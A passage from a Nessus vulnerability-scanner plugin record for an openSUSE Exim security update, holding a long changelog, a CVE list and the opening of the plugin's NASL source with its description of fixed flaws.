Restore it to doing nothing, silently, and returning good status.\n\n - update to exim 4.94\n\n - some transports now refuse to use tainted data in constructing their delivery location this WILL BREAK configurations which are not updated accordingly. In particular: any Transport use of $local_user which has been relying upon check_local_user far away in the Router to make it safe, should be updated to replace $local_user with $local_part_data.\n\n - Attempting to remove, in router or transport, a header name that ends with an asterisk (which is a standards-legal name) will now result in all headers named starting with the string before the asterisk being removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n\n - bring changes from current in +fixes branch (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee 94)\n\n - fixes CVE-2020-12783 (boo#1171490)\n\n - Regard command-line recipients as tainted.\n\n - Bug 2489: Fix crash in the 'pam' expansion condition.\n\n - Use tainted buffers for the transport smtp context.\n\n - Bug 2493: Harden ARC verify against Outlook, which has been seen to mix the ordering of its ARC headers. This caused a crash.\n\n - Bug 2492: Use tainted memory for retry record when needed. Previously when a new record was being constructed with information from the peer, a trap was taken.\n\n - Bug 2494: Unset the default for dmarc_tld_file.\n\n - Fix an uninitialised flag in early-pipelining.\n Previously connections could, depending on the platform, hang at the STARTTLS response.\n\n - Bug 2498: Reset a counter used for ARC verify before handling another message on a connection. 
Previously if one message had ARC headers and the following one did not, a crash could result when adding an Authentication-Results: header.\n\n - Bug 2500: Rewind some of the common-coding in string handling between the Exim main code and Exim-related utilities.\n\n - Fix the variables set by the gsasl authenticator.\n\n - Bug 2507: Modules: on handling a dynamic-module (lookups) open failure, only retrieve the error message once.\n\n - Bug 2501: Fix init call in the heimdal authenticator.\n Previously it adjusted the size of a major service buffer; this failed because the buffer was in use at the time. Change to a compile-time increase in the buffer size, when this authenticator is compiled into exim.\n\n - update to exim 4.93.0.4 (+fixes release)\n\n - Avoid costly startup code when not strictly needed. This reduces time for some exim process initialisations. It does mean that the logging of TLS configuration problems is only done for the daemon startup.\n\n - Early-pipelining support code is now included unless disabled in Makefile.\n\n - DKIM verification defaults no longer accept sha1 hashes, to conform to RFC 8301. They can still be enabled, using the dkim_verify_hashes main option.\n\n - Support CHUNKING from an smtp transport using a transport_filter, when DKIM signing is being done.\n Previously a transport_filter would always disable CHUNKING, falling back to traditional DATA.\n\n - Regard command-line recipients as tainted.\n\n - Bug 340: Remove the daemon pid file on exit, when due to SIGTERM.\n\n - Bug 2489: Fix crash in the 'pam' expansion condition. It seems that the PAM library frees one of the arguments given to it, despite the documentation. Therefore a plain malloc must be used.\n\n - Bug 2491: Use tainted buffers for the transport smtp context. 
Previously on-stack buffers were used, resulting in a taint trap when DSN information copied from a received message was written into the buffer.\n\n - Bug 2493: Harden ARC verify against Outlook, which has been seen to mix the ordering of its ARC headers. This caused a crash.\n\n - Bug 2492: Use tainted memory for retry record when needed. Previously when a new record was being constructed with information from the peer, a trap was taken.\n\n - Bug 2494: Unset the default for dmarc_tld_file.\n Previously a naive installation would get error messages from DMARC verify, when it hit the nonexistent file indicated by the default. Distros wanting DMARC enabled should both provide the file and set the option.\n Also enforce no DMARC verification for command-line sourced messages.\n\n - Fix an uninitialised flag in early-pipelining.\n Previously connections could, depending on the platform, hang at the STARTTLS response.\n\n - Bug 2498: Reset a counter used for ARC verify before handling another message on a connection. Previously if one message had ARC headers and the following one did not, a crash could result when adding an Authentication-Results: header.\n\n - Bug 2500: Rewind some of the common-coding in string handling between the Exim main code and Exim-related utilities. The introduction of taint tracking also did many adjustments to string handling. Since then, eximon frequently terminated with an assert failure.\n\n - When PIPELINING, synch after every hundred or so RCPT commands sent and check for 452 responses. This slightly helps the inefficiency of doing a large alias-expansion into a recipient-limited target. The max_rcpt transport option still applies (and at the current default, will override the new feature). 
The check is done for either cause of synch, and forces a fast-retry of all 452'd recipients using a new MAIL FROM on the same connection.\n The new facility is not tunable at this time.\n\n - Fix the variables set by the gsasl authenticator.\n Previously a pointer to library live data was being used, so the results became garbage. Make copies while it is still usable.\n\n - Logging: when the deliver_time selector is set, include the DT= field on delivery deferred (==) and failed (**) lines (if a delivery was attempted). Previously it was only on completion (=>) lines.\n\n - Authentication: the gsasl driver now provides the $authN variables in time for the expansion of the server_scram_iter and server_scram_salt options.\n\nspec file cleanup to make update work\n\n - add docdir to spec\n\n - update to exim 4.93\n\n - SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n\n - DISABLE_TLS replaces SUPPORT_TLS\n\n - Bump the version for the local_scan API.\n\n - smtp transport option hosts_try_fastopen defaults to '*'.\n\n - DNSSec is requested (not required) for all queries.\n (This seems to ask for trouble if your resolver is a systemd-resolved.)\n\n - Generic router option retry_use_local_part defaults to 'true' under specific pre-conditions.\n\n - Introduce a tainting mechanism for values read from untrusted sources.\n\n - Use longer file names for temporary spool files (this avoids name conflicts with spool on a shared file system).\n\n - Use dsn_from main config option (was ignored previously).\n\n - update to exim 4.92.3\n\n - CVE-2019-16928: fix against Heap-based buffer overflow in string_vformat, remote code execution seems to be possible\n\n - update to exim 4.92.2\n\n - CVE-2019-15846: fix against remote attackers executing arbitrary code as root via a trailing backslash\n\n - update to exim 4.92.1\n\n - CVE-2019-13917: Fixed an issue with $(sort) expansion which could allow remote attackers to execute other programs with root privileges (boo#1142207)\n\n - spec 
file cleanup\n\n - fix DANE inclusion guard condition\n\n - re-enable i18n and remove misleading comment\n\n - EXPERIMENTAL_SPF is now SUPPORT_SPF\n\n - DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n\n - $(l_header:<name>) expansion\n\n - $(readsocket) now supports TLS\n\n - 'utf8_downconvert' option (if built with SUPPORT_I18N)\n\n - 'pipelining' log_selector\n\n - JSON variants for $(extract ) expansion\n\n - 'noutf8' debug option\n\n - TCP Fast Open support on MacOS\n\n - CVE-2019-10149: Fixed a Remote Command Execution (boo#1136587)\n\n - add workaround patch for compile time error on missing printf format annotation (gnu_printf.patch)\n\n - update to 4.91\n\n - DEFER rather than ERROR on redis cluster MOVED response.\n\n - Catch and remove uninitialized value warning in exiqsumm\n\n - Disallow '/' characters in queue names specified for the 'queue=' ACL modifier. This matches the restriction on the commandline.\n\n - Fix pgsql lookup for multiple result-tuples with a single column. Previously only the last row was returned.\n\n - Bug 2217: Tighten up the parsing of DKIM signature headers.\n\n - Bug 2215: Fix crash associated with dnsdb lookup done from DKIM ACL.\n\n - Fix issue with continued-connections when the DNS shifts unreliably.\n\n - Bug 2214: Fix SMTP responses resulting from non-accept result of MIME ACL.\n\n - The 'support for' informational output now, which built with Content Scanning support, has a line for the malware scanner interfaces compiled in. Interface can be individually included or not at build time.\n\n - The 'aveserver', 'kavdaemon' and 'mksd' interfaces are now not included by the template makefile 'src/EDITME'.\n The 'STREAM' support for an older ClamAV interface method is removed.\n\n - Bug 2223: Fix mysql lookup returns for the no-data case (when the number of rows affected is given instead).\n\n - The runtime Berkeley DB library version is now additionally output by 'exim -d -bV'. 
Previously only the compile-time version was shown.\n\n - Bug 2230: Fix cutthrough routing for nonfirst messages in an initiating SMTP connection.\n\n - Bug 2229: Fix cutthrough routing for nonstandard port numbers defined by routers.\n\n - Bug 2174: A timeout on connect for a callout was also erroneously seen as a timeout on read on a GnuTLS initiating connection, resulting in the initiating connection being dropped.\n\n - Relax results from ACL control request to enable cutthrough, in unsupported situations, from error to silently (except under debug) ignoring.\n\n - Fix Buffer overflow in base64d() (CVE-2018-6789)\n\n - Fix bug in DKIM verify: a buffer overflow could corrupt the malloc metadata, resulting in a crash in free().\n\n - Fix broken Heimdal GSSAPI authenticator integration.\n\n - Bug 2113: Fix conversation closedown with the Avast malware scanner.\n\n - Bug 2239: Enforce non-usability of control=utf8_downconvert in the mail ACL.\n\n - Speed up macro lookups during configuration file read, by skipping non- macro text after a replacement (previously it was only once per line) and by skipping builtin macros when searching for an uppercase lead character.\n\n - DANE support moved from Experimental to mainline. The Makefile control for the build is renamed.\n\n - Fix memory leak during multi-message connections using STARTTLS.\n\n - Bug 2236: When a DKIM verification result is overridden by ACL, DMARC reported the original. 
Fix to report (as far as possible) the ACL result replacing the original.\n\n - Fix memory leak during multi-message connections using STARTTLS under OpenSSL\n\n - Bug 2242: Fix exim_dbmbuild to permit directoryless filenames.\n\n - Fix utf8_downconvert propagation through a redirect router.\n\n - Bug 2253: For logging delivery lines under PRDR, append the overall DATA response info to the (existing) per-recipient response info for the 'C=' log element.\n\n - Bug 2251: Fix ldap lookups that return a single attribute having zero- length value.\n\n - Support Avast multiline protocol, this allows passing flags to newer versions of the scanner.\n\n - Ensure that variables possibly set during message acceptance are marked dead before release of memory in the daemon loop.\n\n - Bug 2250: Fix a longstanding bug in heavily-pipelined SMTP input (such as a multi-recipient message from a mailinglist manager).\n\n - The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is withdrawn, being replaced by the $(authresults ) expansion.\n\n - Bug 2257: Fix pipe transport to not use a socket-only syscall.\n\n - Set a handler for SIGTERM and call exit(3) if running as PID 1. This allows proper process termination in container environments.\n\n - Bug 2258: Fix spool_wireformat in combination with LMTP transport. Previously the 'final dot' had a newline after it; ensure it is CR,LF.\n\n - SPF: remove support for the 'spf' ACL condition outcome values 'err_temp' and 'err_perm', deprecated since 4.83 when the RFC-defined words ' temperror' and 'permerror' were introduced.\n\n - Re-introduce enforcement of no cutthrough delivery on transports having transport-filters or DKIM-signing.\n\n - Cutthrough: for a final-dot response timeout (and nonunderstood responses) in defer=pass mode supply a 450 to the initiator. 
Previously the message would be spooled.\n\n - DANE: add dane_require_tls_ciphers SMTP Transport option; if unset, tls_require_ciphers is used as before.\n\n - Malware Avast: Better match the Avast multiline protocol.\n\n - Fix reinitialisation of DKIM logging variable between messages.\n\n - Bug 2255: Revert the disable of the OpenSSL session caching.\n\n - Add util/renew-opendmarc-tlds.sh script for safe renewal of public suffix list.\n\n - DKIM: accept Ed25519 pubkeys in SubjectPublicKeyInfo-wrapped form, since the IETF WG has not yet settled on that versus the original 'bare' representation.\n\n - Fix syslog logging for syslog_timestamp=no and log_selector +millisec. Previously the millisecond value corrupted the output. Fix also for syslog_pid=no and log_selector +pid, for which the pid corrupted the output.\n\n - Replace xorg-x11-devel by individual pkgconfig() buildrequires. \n\n - update to 4.90.1\n\n - Allow PKG_CONFIG_PATH to be set in Local/Makefile and use it correctly during configuration. Wildcards are allowed and expanded.\n\n - Shorten the log line for daemon startup by collapsing adjacent sets of identical IP addresses on different listening ports. Will also affect 'exiwhat' output.\n\n - Tighten up the checking in isip4 (et al): dotted-quad components larger than 255 are no longer allowed.\n\n - Default openssl_options to include +no_ticket, to reduce load on peers. Disable the session-cache too, which might reduce our load. Since we currrectly use a new context for every connection, both as server and client, there is no benefit for these.\n\n - Add $SOURCE_DATE_EPOCH support for reproducible builds, per spec at <https://reproducible-builds.org/specs/source-date-epoch />.\n\n - Fix smtp transport use of limited max_rcpt under mua_wrapper. Previously the check for any unsuccessful recipients did not notice the limit, and erroneously found still-pending ones.\n\n - Pipeline CHUNKING command and data together, on kernels that support MSG_MORE. 
Only in-clear (not on TLS connections).\n\n - Avoid using a temporary file during transport using dkim. Unless a transport-filter is involved we can buffer the headers in memory for creating the signature, and read the spool data file once for the signature and again for transmission.\n\n - Enable use of sendfile in Linux builds as default. It was disabled in 4.77 as the kernel support then wasn't solid, having issues in 64bit mode. Now, it's been long enough. Add support for FreeBSD also.\n\n - Add commandline_checks_require_admin option.\n\n - Do pipelining under TLS.\n\n - For the 'sock' variant of the malware scanner interface, accept an empty cmdline element to get the documented default one. Previously it was inaccessible.\n\n - Prevent repeated use of -p/-oMr\n\n - DKIM: enforce the DNS pubkey record 'h' permitted-hashes optional field, if present.\n\n - DKIM: when a message has multiple signatures matching an identity given in dkim_verify_signers, run the dkim acl once for each.\n\n - Support IDNA2008.\n\n - The path option on a pipe transport is now expanded before use\n\n - Have the EHLO response advertise VRFY, if there is a vrfy ACL defined.\n\n - Several bug fixes\n\n - Fix for buffer overflow in base64decode() (boo#1079832 CVE-2018-6789)", "cvss3": {}, "published": "2021-05-18T00:00:00", "type": "nessus", "title": "openSUSE Security Update : exim (openSUSE-2021-677) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369", "CVE-2017-16943", "CVE-2017-16944", "CVE-2018-6789", "CVE-2019-10149", "CVE-2019-13917", "CVE-2019-15846", "CVE-2019-16928", "CVE-2020-12783", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], 
"modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:exim", "p-cpe:/a:novell:opensuse:exim-debuginfo", "p-cpe:/a:novell:opensuse:exim-debugsource", "p-cpe:/a:novell:opensuse:eximon", "p-cpe:/a:novell:opensuse:eximon-debuginfo", "p-cpe:/a:novell:opensuse:eximstats-html", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-677.NASL", "href": "https://www.tenable.com/plugins/nessus/149614", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2021-677.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149614);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2017-1000369\",\n \"CVE-2017-16943\",\n \"CVE-2017-16944\",\n \"CVE-2018-6789\",\n \"CVE-2019-10149\",\n \"CVE-2019-13917\",\n \"CVE-2019-15846\",\n \"CVE-2019-16928\",\n \"CVE-2020-12783\",\n \"CVE-2020-28007\",\n \"CVE-2020-28008\",\n \"CVE-2020-28009\",\n \"CVE-2020-28010\",\n \"CVE-2020-28011\",\n \"CVE-2020-28012\",\n \"CVE-2020-28013\",\n \"CVE-2020-28014\",\n \"CVE-2020-28015\",\n \"CVE-2020-28016\",\n \"CVE-2020-28017\",\n \"CVE-2020-28018\",\n \"CVE-2020-28019\",\n \"CVE-2020-28020\",\n \"CVE-2020-28021\",\n \"CVE-2020-28022\",\n \"CVE-2020-28023\",\n \"CVE-2020-28024\",\n \"CVE-2020-28025\",\n \"CVE-2020-28026\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0413\");\n\n script_name(english:\"openSUSE Security Update : exim 
(openSUSE-2021-677) (Stack Clash)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for exim fixes the following issues :\n\nExim was updated to exim-4.94.2\n\nsecurity update (boo#1185631)\n\n - CVE-2020-28007: Link attack in Exim's log directory\n\n - CVE-2020-28008: Assorted attacks in Exim's spool\n directory\n\n - CVE-2020-28014: Arbitrary PID file creation\n\n - CVE-2020-28011: Heap buffer overflow in queue_run()\n\n - CVE-2020-28010: Heap out-of-bounds write in main()\n\n - CVE-2020-28013: Heap buffer overflow in\n parse_fix_phrase()\n\n - CVE-2020-28016: Heap out-of-bounds write in\n parse_fix_phrase()\n\n - CVE-2020-28015: New-line injection into spool header\n file (local)\n\n - CVE-2020-28012: Missing close-on-exec flag for\n privileged pipe\n\n - CVE-2020-28009: Integer overflow in get_stdinput()\n\n - CVE-2020-28017: Integer overflow in\n receive_add_recipient()\n\n - CVE-2020-28020: Integer overflow in receive_msg()\n\n - CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n\n - CVE-2020-28021: New-line injection into spool header\n file (remote)\n\n - CVE-2020-28022: Heap out-of-bounds read and write in\n extract_option()\n\n - CVE-2020-28026: Line truncation and injection in\n spool_read_header()\n\n - CVE-2020-28019: Failure to reset function pointer after\n BDAT error\n\n - CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n\n - CVE-2020-28018: Use-after-free in tls-openssl.c\n\n - CVE-2020-28025: Heap out-of-bounds read in\n pdkim_finish_bodyhash()\n\nupdate to exim-4.94.1\n\n - Fix security issue in BDAT state confusion. Ensure we\n reset known-good where we know we need to not be reading\n BDAT data, as a general case fix, and move the places\n where we switch to BDAT mode until after various\n protocol state checks. 
Fixes CVE-2020-BDATA reported by\n Qualys.\n\n - Fix security issue in SMTP verb option parsing\n (CVE-2020-EXOPT)\n\n - Fix security issue with too many recipients on a message\n (to remove a known security problem if someone does set\n recipients_max to unlimited, or if local additions add\n to the recipient list). Fixes CVE-2020-RCPTL reported by\n Qualys.\n\n - Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in\n parse_fix_phrase()\n\n - Fix security issue CVE-2020-PFPSN and guard against\n cmdline invoker providing a particularly obnoxious\n sender full name.\n\n - Fix Linux security issue CVE-2020-SLCWD and guard\n against PATH_MAX better.\n\n - bring back missing exim_db.8 manual page (fixes\n boo#1173693)\n\n - bring in changes from current +fixes (lots of taint\n check fixes)\n\n - Bug 1329: Fix format of Maildir-format filenames to\n match other mail- related applications. Previously an\n 'H' was used where available info says that 'M' should\n be, so change to match.\n\n - Bug 2587: Fix pam expansion condition. Tainted values\n are commonly used as arguments, so an implementation\n trying to copy these into a local buffer was taking a\n taint-enforcement trap. Fix by using dynamically created\n buffers.\n\n - Bug 2586: Fix listcount expansion operator. Using\n tainted arguments is reasonable, eg. to count headers.\n Fix by using dynamically created buffers rather than a\n local. Do similar fixes for ACL actions 'dcc',\n 'log_reject_target', 'malware' and 'spam'; the arguments\n are expanded so could be handling tainted values.\n\n - Bug 2590: Fix -bi (newaliases). A previous code\n rearrangement had broken the (no-op) support for this\n sendmail command. Restore it to doing nothing, silently,\n and returning good status.\n\n - update to exim 4.94\n\n - some transports now refuse to use tainted data in\n constructing their delivery location this WILL BREAK\n configurations which are not updated accordingly. 
In\n particular: any Transport use of $local_user which has\n been relying upon check_local_user far away in the\n Router to make it safe, should be updated to replace\n $local_user with $local_part_data.\n\n - Attempting to remove, in router or transport, a header\n name that ends with an asterisk (which is a\n standards-legal name) will now result in all headers\n named starting with the string before the asterisk being\n removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n\n - bring changes from current in +fixes branch\n (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee\n 94)\n\n - fixes CVE-2020-12783 (boo#1171490)\n\n - Regard command-line recipients as tainted.\n\n - Bug 2489: Fix crash in the 'pam' expansion condition.\n\n - Use tainted buffers for the transport smtp context.\n\n - Bug 2493: Harden ARC verify against Outlook, which has\n been seen to mix the ordering of its ARC headers. This\n caused a crash.\n\n - Bug 2492: Use tainted memory for retry record when\n needed. Previously when a new record was being\n constructed with information from the peer, a trap was\n taken.\n\n - Bug 2494: Unset the default for dmarc_tld_file.\n\n - Fix an uninitialised flag in early-pipelining.\n Previously connections could, depending on the platform,\n hang at the STARTTLS response.\n\n - Bug 2498: Reset a counter used for ARC verify before\n handling another message on a connection. 
Previously if\n one message had ARC headers and the following one did\n not, a crash could result when adding an\n Authentication-Results: header.\n\n - Bug 2500: Rewind some of the common-coding in string\n handling between the Exim main code and Exim-related\n utities.\n\n - Fix the variables set by the gsasl authenticator.\n\n - Bug 2507: Modules: on handling a dynamic-module\n (lookups) open failure, only retrieve the errormessage\n once.\n\n - Bug 2501: Fix init call in the heimdal authenticator.\n Previously it adjusted the size of a major service\n buffer; this failed because the buffer was in use at the\n time. Change to a compile-time increase in the buffer\n size, when this authenticator is compiled into exim.\n\n - update to exim 4.93.0.4 (+fixes release)\n\n - Avoid costly startup code when not strictly needed. This\n reduces time for some exim process initialisations. It\n does mean that the logging of TLS configuration problems\n is only done for the daemon startup.\n\n - Early-pipelining support code is now included unless\n disabled in Makefile.\n\n - DKIM verification defaults no long accept sha1 hashes,\n to conform to RFC 8301. They can still be enabled, using\n the dkim_verify_hashes main option.\n\n - Support CHUNKING from an smtp transport using a\n transport_filter, when DKIM signing is being done.\n Previously a transport_filter would always disable\n CHUNKING, falling back to traditional DATA.\n\n - Regard command-line receipients as tainted.\n\n - Bug 340: Remove the daemon pid file on exit, whe due to\n SIGTERM.\n\n - Bug 2489: Fix crash in the 'pam' expansion condition. It\n seems that the PAM library frees one of the arguments\n given to it, despite the documentation. Therefore a\n plain malloc must be used.\n\n - Bug 2491: Use tainted buffers for the transport smtp\n context. 
Previously on-stack buffers were used,\n resulting in a taint trap when DSN information copied\n from a received message was written into the buffer.\n\n - Bug 2493: Harden ARC verify against Outlook, whick has\n been seen to mix the ordering of its ARC headers. This\n caused a crash.\n\n - Bug 2492: Use tainted memory for retry record when\n needed. Previously when a new record was being\n constructed with information from the peer, a trap was\n taken.\n\n - Bug 2494: Unset the default for dmarc_tld_file.\n Previously a naiive installation would get error\n messages from DMARC verify, when it hit the nonexistent\n file indicated by the default. Distros wanting DMARC\n enabled should both provide the file and set the option.\n Also enforce no DMARC verification for command-line\n sourced messages.\n\n - Fix an uninitialised flag in early-pipelining.\n Previously connections could, depending on the platform,\n hang at the STARTTLS response.\n\n - Bug 2498: Reset a counter used for ARC verify before\n handling another message on a connection. Previously if\n one message had ARC headers and the following one did\n not, a crash could result when adding an\n Authentication-Results: header.\n\n - Bug 2500: Rewind some of the common-coding in string\n handling between the Exim main code and Exim-related\n utities. The introduction of taint tracking also did\n many adjustments to string handling. Since then, eximon\n frequently terminated with an assert failure.\n\n - When PIPELINING, synch after every hundred or so RCPT\n commands sent and check for 452 responses. This slightly\n helps the inefficieny of doing a large alias-expansion\n into a recipient-limited target. The max_rcpt transport\n option still applies (and at the current default, will\n override the new feature). 
The check is done for either\n cause of synch, and forces a fast-retry of all 452'd\n recipients using a new MAIL FROM on the same connection.\n The new facility is not tunable at this time.\n\n - Fix the variables set by the gsasl authenticator.\n Previously a pointer to library live data was being\n used, so the results became garbage. Make copies while\n it is still usable.\n\n - Logging: when the deliver_time selector ise set, include\n the DT= field on delivery deferred (==) and failed (**)\n lines (if a delivery was attemtped). Previously it was\n only on completion (=>) lines.\n\n - Authentication: the gsasl driver not provides the $authN\n variables in time for the expansion of the\n server_scram_iter and server_scram_salt options.\n\nspec file cleanup to make update work\n\n - add docdir to spec\n\n - update to exim 4.93\n\n - SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n\n - DISABLE_TLS replaces SUPPORT_TLS\n\n - Bump the version for the local_scan API.\n\n - smtp transport option hosts_try_fastopen defaults to\n '*'.\n\n - DNSSec is requested (not required) for all queries.\n (This seemes to ask for trouble if your resolver is a\n systemd-resolved.)\n\n - Generic router option retry_use_local_part defaults to\n 'true' under specific pre-conditions.\n\n - Introduce a tainting mechanism for values read from\n untrusted sources.\n\n - Use longer file names for temporary spool files (this\n avoids name conflicts with spool on a shared file\n system).\n\n - Use dsn_from main config option (was ignored\n previously).\n\n - update to exim 4.92.3\n\n - CVE-2019-16928: fix against Heap-based buffer overflow\n in string_vformat, remote code execution seems to be\n possible\n\n - update to exim 4.92.2\n\n - CVE-2019-15846: fix against remote attackers executing\n arbitrary code as root via a trailing backslash\n\n - update to exim 4.92.1\n\n - CVE-2019-13917: Fixed an issue with $(sort) expansion\n which could allow remote attackers to execute other\n programs with 
root privileges (boo#1142207)\n\n - spec file cleanup\n\n - fix DANE inclusion guard condition\n\n - re-enable i18n and remove misleading comment\n\n - EXPERIMENTAL_SPF is now SUPPORT_SPF\n\n - DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n\n - $(l_header:<name>) expansion\n\n - $(readsocket) now supports TLS\n\n - 'utf8_downconvert' option (if built with SUPPORT_I18N)\n\n - 'pipelining' log_selector\n\n - JSON variants for $(extract ) expansion\n\n - 'noutf8' debug option\n\n - TCP Fast Open support on MacOS\n\n - CVE-2019-10149: Fixed a Remote Command Execution\n (boo#1136587)\n\n - add workaround patch for compile time error on missing\n printf format annotation (gnu_printf.patch)\n\n - update to 4.91\n\n - DEFER rather than ERROR on redis cluster MOVED response.\n\n - Catch and remove uninitialized value warning in exiqsumm\n\n - Disallow '/' characters in queue names specified for the\n 'queue=' ACL modifier. This matches the restriction on\n the commandline.\n\n - Fix pgsql lookup for multiple result-tuples with a\n single column. Previously only the last row was\n returned.\n\n - Bug 2217: Tighten up the parsing of DKIM signature\n headers.\n\n - Bug 2215: Fix crash associated with dnsdb lookup done\n from DKIM ACL.\n\n - Fix issue with continued-connections when the DNS shifts\n unreliably.\n\n - Bug 2214: Fix SMTP responses resulting from non-accept\n result of MIME ACL.\n\n - The 'support for' informational output now, which built\n with Content Scanning support, has a line for the\n malware scanner interfaces compiled in. 
Interface can be\n individually included or not at build time.\n\n - The 'aveserver', 'kavdaemon' and 'mksd' interfaces are\n now not included by the template makefile 'src/EDITME'.\n The 'STREAM' support for an older ClamAV interface\n method is removed.\n\n - Bug 2223: Fix mysql lookup returns for the no-data case\n (when the number of rows affected is given instead).\n\n - The runtime Berkeley DB library version is now\n additionally output by 'exim -d -bV'. Previously only\n the compile-time version was shown.\n\n - Bug 2230: Fix cutthrough routing for nonfirst messages\n in an initiating SMTP connection.\n\n - Bug 2229: Fix cutthrough routing for nonstandard port\n numbers defined by routers.\n\n - Bug 2174: A timeout on connect for a callout was also\n erroneously seen as a timeout on read on a GnuTLS\n initiating connection, resulting in the initiating\n connection being dropped.\n\n - Relax results from ACL control request to enable\n cutthrough, in unsupported situations, from error to\n silently (except under debug) ignoring.\n\n - Fix Buffer overflow in base64d() (CVE-2018-6789)\n\n - Fix bug in DKIM verify: a buffer overflow could corrupt\n the malloc metadata, resulting in a crash in free().\n\n - Fix broken Heimdal GSSAPI authenticator integration.\n\n - Bug 2113: Fix conversation closedown with the Avast\n malware scanner.\n\n - Bug 2239: Enforce non-usability of\n control=utf8_downconvert in the mail ACL.\n\n - Speed up macro lookups during configuration file read,\n by skipping non- macro text after a replacement\n (previously it was only once per line) and by skipping\n builtin macros when searching for an uppercase lead\n character.\n\n - DANE support moved from Experimental to mainline. The\n Makefile control for the build is renamed.\n\n - Fix memory leak during multi-message connections using\n STARTTLS.\n\n - Bug 2236: When a DKIM verification result is overridden\n by ACL, DMARC reported the original. 
Fix to report (as\n far as possible) the ACL result replacing the original.\n\n - Fix memory leak during multi-message connections using\n STARTTLS under OpenSSL\n\n - Bug 2242: Fix exim_dbmbuild to permit directoryless\n filenames.\n\n - Fix utf8_downconvert propagation through a redirect\n router.\n\n - Bug 2253: For logging delivery lines under PRDR, append\n the overall DATA response info to the (existing)\n per-recipient response info for the 'C=' log element.\n\n - Bug 2251: Fix ldap lookups that return a single\n attribute having zero- length value.\n\n - Support Avast multiline protocol, this allows passing\n flags to newer versions of the scanner.\n\n - Ensure that variables possibly set during message\n acceptance are marked dead before release of memory in\n the daemon loop.\n\n - Bug 2250: Fix a longstanding bug in heavily-pipelined\n SMTP input (such as a multi-recipient message from a\n mailinglist manager).\n\n - The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is\n withdrawn, being replaced by the $(authresults )\n expansion.\n\n - Bug 2257: Fix pipe transport to not use a socket-only\n syscall.\n\n - Set a handler for SIGTERM and call exit(3) if running as\n PID 1. This allows proper process termination in\n container environments.\n\n - Bug 2258: Fix spool_wireformat in combination with LMTP\n transport. Previously the 'final dot' had a newline\n after it; ensure it is CR,LF.\n\n - SPF: remove support for the 'spf' ACL condition outcome\n values 'err_temp' and 'err_perm', deprecated since 4.83\n when the RFC-defined words ' temperror' and 'permerror'\n were introduced.\n\n - Re-introduce enforcement of no cutthrough delivery on\n transports having transport-filters or DKIM-signing.\n\n - Cutthrough: for a final-dot response timeout (and\n nonunderstood responses) in defer=pass mode supply a 450\n to the initiator. 
Previously the message would be\n spooled.\n\n - DANE: add dane_require_tls_ciphers SMTP Transport\n option; if unset, tls_require_ciphers is used as before.\n\n - Malware Avast: Better match the Avast multiline\n protocol.\n\n - Fix reinitialisation of DKIM logging variable between\n messages.\n\n - Bug 2255: Revert the disable of the OpenSSL session\n caching.\n\n - Add util/renew-opendmarc-tlds.sh script for safe renewal\n of public suffix list.\n\n - DKIM: accept Ed25519 pubkeys in\n SubjectPublicKeyInfo-wrapped form, since the IETF WG has\n not yet settled on that versus the original 'bare'\n representation.\n\n - Fix syslog logging for syslog_timestamp=no and\n log_selector +millisec. Previously the millisecond value\n corrupted the output. Fix also for syslog_pid=no and\n log_selector +pid, for which the pid corrupted the\n output.\n\n - Replace xorg-x11-devel by individual pkgconfig()\n buildrequires. \n\n - update to 4.90.1\n\n - Allow PKG_CONFIG_PATH to be set in Local/Makefile and\n use it correctly during configuration. Wildcards are\n allowed and expanded.\n\n - Shorten the log line for daemon startup by collapsing\n adjacent sets of identical IP addresses on different\n listening ports. Will also affect 'exiwhat' output.\n\n - Tighten up the checking in isip4 (et al): dotted-quad\n components larger than 255 are no longer allowed.\n\n - Default openssl_options to include +no_ticket, to reduce\n load on peers. Disable the session-cache too, which\n might reduce our load. Since we currrectly use a new\n context for every connection, both as server and client,\n there is no benefit for these.\n\n - Add $SOURCE_DATE_EPOCH support for reproducible builds,\n per spec at\n <https://reproducible-builds.org/specs/source-date-epoch\n />.\n\n - Fix smtp transport use of limited max_rcpt under\n mua_wrapper. 
